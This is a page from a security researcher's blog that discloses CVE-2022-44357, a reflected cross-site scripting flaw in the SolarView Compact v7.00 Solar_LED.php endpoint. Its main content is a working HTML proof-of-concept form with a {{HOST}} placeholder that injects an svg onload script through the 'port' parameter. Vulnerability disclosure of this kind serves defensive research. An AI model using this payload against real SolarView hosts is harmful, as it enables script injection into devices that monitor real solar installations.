Strik3r Blog
  • $ whoami
  • Security Research
    • CVEs POCs
      • CVE-2023-37831
      • CVE-2023-37832
      • CVE-2023-37833
      • CVE-2023-37835
      • CVE-2023-39695
      • CVE-2023-36082
      • CVE-2023-36081
      • CVE-2023-34673
      • CVE-2023-34672
      • CVE-2023-34671
      • CVE-2022-44354
      • CVE-2022-44355
      • CVE-2022-44356
      • CVE-2022-48164
      • CVE-2022-48165
      • CVE-2022-48166
      • CVE-2022-44357
    • How To Pass Your eJPT Exam
    • Hacking IoT Introduction
    • Hacking wireless by monitoring
    • The Art of Camouflage: Exploring Advanced PHP Backdoor Obfuscation Techniques
    • Beyond the Desktop: Exploiting a Leaked Token for API
  • Hack The Box
    • Paper
  • CyberTalents Challenges
    • Web Chanllenges
      • Private Agent
    • Intro to Cybersecurity Bootcamp CTF Assessment
  • Bug Bounty
    • Easy LFI
    • HTTP PUT Method Exploit
Powered by GitBook
On this page

Was this helpful?

  1. Security Research
  2. CVEs POCs

CVE-2022-44357

Cross-site Scripting (XSS) - Reflected in SolarView Compact v7.00 Via crafted POST Request via /Solar_LED.php endpoint

POC:

When someone opens this html file, or if attacker add it into his website, XSS will execute at the targeted vulnerable SolarView Compact host

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://{{HOST}}/Solar_LED.php" method="POST">
      <input type="hidden" name="led&#95;id&#91;&#93;" value="&#58;11" />
      <input type="hidden" name="led&#95;digits&#91;&#93;" value="1" />
      <input type="hidden" name="led&#95;id&#91;&#93;" value="&#58;11" />
      <input type="hidden" name="led&#95;digits&#91;&#93;" value="1" />
      <input type="hidden" name="led&#95;id&#91;&#93;" value="&#58;11" />
      <input type="hidden" name="led&#95;digits&#91;&#93;" value="1" />
      <input type="hidden" name="led&#95;id&#91;&#93;" value="&#58;11" />
      <input type="hidden" name="led&#95;digits&#91;&#93;" value="1" />
      <input type="hidden" name="port" value="batman&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS_By_Strik3r&apos;&#41;&gt;" />
      <input type="hidden" name="btnSave" value="&#149;Û&#145;&#182;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
PreviousCVE-2022-48166NextHow To Pass Your eJPT Exam

Last updated 1 year ago

Was this helpful?

image